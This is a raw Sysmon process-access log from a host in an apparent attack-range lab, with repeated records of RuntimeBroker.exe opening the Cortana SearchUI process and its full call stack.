13:58:35.851{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012225Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.851{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012224Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.851{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012223Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.851{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012222Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.851{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012221Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.851{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012220Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.851{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012219Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.851{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012218Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.851{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012217Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.851{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012216Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.851{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012215Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.851{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012214Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.851{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012213Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.851{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012212Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.851{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012211Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.851{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012210Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.851{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012209Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.851{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012208Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.851{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012207Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
